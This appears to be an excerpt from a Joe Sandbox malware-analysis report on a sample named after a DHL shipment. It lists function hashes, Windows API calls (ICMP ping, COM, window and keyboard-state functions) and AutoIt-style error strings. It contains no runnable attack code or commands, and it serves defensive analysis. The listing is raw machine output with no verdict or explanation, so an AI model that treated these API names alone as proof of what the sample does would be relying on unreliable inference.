                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 1707d4940659271b62050ae79754027796a443c7f5127ac5ec27bba3d27d625b
                                                                                      • Instruction ID: 12a9c47488b58d03eaf1e3f35ccb79efd117cf5f46cfe62b20b8ea63318f6c99
                                                                                      • Opcode Fuzzy Hash: 1707d4940659271b62050ae79754027796a443c7f5127ac5ec27bba3d27d625b
                                                                                      • Instruction Fuzzy Hash: 6B41A5349447C96EFF319E61C8443A5FEE06F11348F08905ADAC67A5C3DBA59DC8C792
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00E205BC
                                                                                      • inet_addr.WSOCK32(?), ref: 00E2061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 00E20628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00E20636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E206C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E206E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00E207B9
                                                                                      • WSACleanup.WSOCK32 ref: 00E207BF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      • Opcode ID: 79dfb52c18b2eee90e278eb0b0c333089f4d20c8d9e025d2b52958a8f774a971
                                                                                      • Instruction ID: 53a39667616e51b326dc763ce4d27fb52ed854f7fcae225fc2ae00209a473cc3
                                                                                      • Opcode Fuzzy Hash: 79dfb52c18b2eee90e278eb0b0c333089f4d20c8d9e025d2b52958a8f774a971
                                                                                      • Instruction Fuzzy Hash: B1919E356042119FD320DF25E888F1ABBE0EF44318F1495AAF46AAB6A3C770ED45CF91
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 707087890-567219261
                                                                                      • Opcode ID: cb829703630f70547771acf36045d82d3884835f869c4c0ba11dd0954be4cbc5
                                                                                      • Instruction ID: e9e82feb6cff75d05e9d02ab9fcac753c7c3ef06921e32dd2c0b5982ac9bff1d
                                                                                      • Opcode Fuzzy Hash: cb829703630f70547771acf36045d82d3884835f869c4c0ba11dd0954be4cbc5
                                                                                      • Instruction Fuzzy Hash: CD51C032A011269BCB24DF68DE509BEB3A5FF65368B255229E426F72C4DF30DD44C7A0
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 00E23774
                                                                                      • CoUninitialize.OLE32 ref: 00E2377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00E3FB78,?), ref: 00E237D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 00E2384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 00E238E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E23936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
                                                                                      • Opcode ID: 0a4376062e84db0ddc016be10c2f444d513e6f77b9eeba93809fb58a7db242e1
                                                                                      • Instruction ID: a0dd5896207bfd41861ef5f5cff23ed9b690e63ab50a4816acb1b2e9a11c6d66
                                                                                      • Opcode Fuzzy Hash: 0a4376062e84db0ddc016be10c2f444d513e6f77b9eeba93809fb58a7db242e1
                                                                                      • Instruction Fuzzy Hash: EB61B270608311AFD714DF64E849F9ABBE4EF45714F10180AF585AB291D774EE88CFA2
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E133CF
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E133F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-3080491070
                                                                                      • Opcode ID: 8003d5d3cf328f39946dd77a7737472603a55c85376f01948a0ff096fdc11456
                                                                                      • Instruction ID: 642aa09f6ab748528cce57bb866ffa00475694fa579202a6c1e80dc5b8425ec4
                                                                                      • Opcode Fuzzy Hash: 8003d5d3cf328f39946dd77a7737472603a55c85376f01948a0ff096fdc11456
                                                                                      • Instruction Fuzzy Hash: 8C51AB72900209AADF15EBE0DD46EEEB7B9EF05740F205065F409720A2EB316F98DB70
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 1256254125-769500911
                                                                                      • Opcode ID: 1432f1fefbd6e457032a15eeb736265729fa5403abad3b38b928d19ef4c3adad
                                                                                      • Instruction ID: 0f8b725b823dde625f4388644f011ebf1874033e883739b7860b9e36b7e18c03
                                                                                      • Opcode Fuzzy Hash: 1432f1fefbd6e457032a15eeb736265729fa5403abad3b38b928d19ef4c3adad
                                                                                      • Instruction Fuzzy Hash: 7D41A932A001279BCB105F7DD8915BE77A5FBA1758B25522AE461F72C4E732CDC1C7A0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E153A0
                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E15416
                                                                                      • GetLastError.KERNEL32 ref: 00E15420
                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00E154A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                      • API String ID: 4194297153-14809454
                                                                                      • Opcode ID: f7a49d9cbe44ec03e363630542bcc90f1f3ffbeefb2711a4ce4fc6119de3648a
                                                                                      • Instruction ID: caef85d252e02af076c098d6222e3b1bc948d5dad70ed1ea4fc75d6339b284c2
                                                                                      • Opcode Fuzzy Hash: f7a49d9cbe44ec03e363630542bcc90f1f3ffbeefb2711a4ce4fc6119de3648a
                                                                                      • Instruction Fuzzy Hash: 0831C336A00504DFC710DF68D489BEABBB4EF85349F149066E416EB292D771DDC6CBA0
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 00E33C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 00E33C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E33D10
                                                                                      • IsMenu.USER32(?), ref: 00E33D24
                                                                                      • CreatePopupMenu.USER32 ref: 00E33D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E33D5B
                                                                                      • DrawMenuBar.USER32 ref: 00E33D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F
                                                                                      • API String ID: 161812096-3044882817
                                                                                      • Opcode ID: 407d23b3fa5dfd1311c67ea8febf248e3defd146cb8222303df4d3c75f2e6a5a
                                                                                      • Instruction ID: c75ece11b635700a0fc1d9b1ec3a4f21ec1996e99b2d35a4474d50fba413a699
                                                                                      • Opcode Fuzzy Hash: 407d23b3fa5dfd1311c67ea8febf248e3defd146cb8222303df4d3c75f2e6a5a
                                                                                      • Instruction Fuzzy Hash: 05414875A01209AFDB14CF65D848EEA7BB5FF49354F140029FA46B7360D731EA14CBA4
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E33A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E33AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E33AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E33AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E33B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E33BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E33BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E33BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E33BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E33C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 312131281-0
                                                                                      • Opcode ID: 16827d49649291faec0f69306d9af8bb8f966174be73de100a78a8eb8e64e769
                                                                                      • Instruction ID: dc60c32391494f27787190a3916148bb434dea2afdf004e1cac813995ea612a9
                                                                                      • Opcode Fuzzy Hash: 16827d49649291faec0f69306d9af8bb8f966174be73de100a78a8eb8e64e769
                                                                                      • Instruction Fuzzy Hash: 0F616A75900248AFDB10DF68CC85EEEBBF8EB49704F105199FA15B72A2C770AE45DB60
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E0B151
                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B165
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00E0B16C
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B17B
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E0B18D
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B1A6
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B1B8
                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B1FD
                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B212
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E0A1E1,?,00000001), ref: 00E0B21D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2156557900-0
                                                                                      • Opcode ID: a62cd7f2347c17a49f8939fd76ef92df3705d13a3ef17b982f6645115c4fa5a4
                                                                                      • Instruction ID: ecb84a836f5e587bc071222a1143e08a2734d487378b77e029edd6fd9256d7ce
                                                                                      • Opcode Fuzzy Hash: a62cd7f2347c17a49f8939fd76ef92df3705d13a3ef17b982f6645115c4fa5a4
                                                                                      • Instruction Fuzzy Hash: 74319E71500208BFDB10DF26EC49BAD7BAABB61715F205405FA09F61E0D7B4DAC88F60
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00DD2C94
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • _free.LIBCMT ref: 00DD2CA0
                                                                                      • _free.LIBCMT ref: 00DD2CAB
                                                                                      • _free.LIBCMT ref: 00DD2CB6
                                                                                      • _free.LIBCMT ref: 00DD2CC1
                                                                                      • _free.LIBCMT ref: 00DD2CCC
                                                                                      • _free.LIBCMT ref: 00DD2CD7
                                                                                      • _free.LIBCMT ref: 00DD2CE2
                                                                                      • _free.LIBCMT ref: 00DD2CED
                                                                                      • _free.LIBCMT ref: 00DD2CFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 910ea247b02ea594771925ecabc85ac20073afde8b834e5fdd7e178e508c48e5
                                                                                      • Instruction ID: 45ea96b86da200d62f7c737c65417aedd9534218a2b39fa0ccac32a01410737b
                                                                                      • Opcode Fuzzy Hash: 910ea247b02ea594771925ecabc85ac20073afde8b834e5fdd7e178e508c48e5
                                                                                      • Instruction Fuzzy Hash: C3118076140108AFCB02EF54DC92CAD3BA9FF15350F4144A6FA489B322DB31EA50AFB0
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DA1459
                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00DA14F8
                                                                                      • UnregisterHotKey.USER32(?), ref: 00DA16DD
                                                                                      • DestroyWindow.USER32(?), ref: 00DE24B9
                                                                                      • FreeLibrary.KERNEL32(?), ref: 00DE251E
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DE254B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                      • String ID: close all
                                                                                      • API String ID: 469580280-3243417748
                                                                                      • Opcode ID: 047dc9a97dfdfe8b4e4878894513da55c6a257f0bfcf21391061185cdfae390d
                                                                                      • Instruction ID: 0189fcd1ddef1521f8125b5db2391920a96be2c73ff679f3f150045a651b5a00
                                                                                      • Opcode Fuzzy Hash: 047dc9a97dfdfe8b4e4878894513da55c6a257f0bfcf21391061185cdfae390d
                                                                                      • Instruction Fuzzy Hash: FCD14A35701252CFCB19EF15C999A69F7A4BF46700F2942ADE44AAB251CB30ED12CF70
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E17FAD
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E17FC1
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E17FEB
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E18005
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18017
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18060
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E180B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                      • String ID: *.*
                                                                                      • API String ID: 769691225-438819550
                                                                                      • Opcode ID: d764a889aec25838fa821d834edb2eb83445e8290330802b5e4bf482a7da1a8d
                                                                                      • Instruction ID: e7cc5becfb29780805d01021ed672ef49dd813cfd340ff3a86132f2eb19de284
                                                                                      • Opcode Fuzzy Hash: d764a889aec25838fa821d834edb2eb83445e8290330802b5e4bf482a7da1a8d
                                                                                      • Instruction Fuzzy Hash: A7819D725082459BCB20EB14C844AEAB7E8FF89754F14585EF8C5E7250EB34DD89CBA2
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00DA5C7A
                                                                                        • Part of subcall function 00DA5D0A: GetClientRect.USER32(?,?), ref: 00DA5D30
                                                                                        • Part of subcall function 00DA5D0A: GetWindowRect.USER32(?,?), ref: 00DA5D71
                                                                                        • Part of subcall function 00DA5D0A: ScreenToClient.USER32(?,?), ref: 00DA5D99
                                                                                      • GetDC.USER32 ref: 00DE46F5
                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DE4708
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00DE4716
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00DE472B
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00DE4733
                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DE47C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                      • String ID: U
                                                                                      • API String ID: 4009187628-3372436214
                                                                                      • Opcode ID: ff4a7508c05834da9fb66a768241bf09aa5f1db3cb37335c41551c5f1c4dc372
                                                                                      • Instruction ID: 456bda372acc82705eb0d097bd9cb31794b2342f849f5c0c73068a8878bc46e3
                                                                                      • Opcode Fuzzy Hash: ff4a7508c05834da9fb66a768241bf09aa5f1db3cb37335c41551c5f1c4dc372
                                                                                      • Instruction Fuzzy Hash: 1671D131400245DFCF21AF65C988AEA7BB5FF4A364F184269ED956A16AC731C881DFB0
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00E135E4
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • LoadStringW.USER32(00E72390,?,00000FFF,?), ref: 00E1360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-2391861430
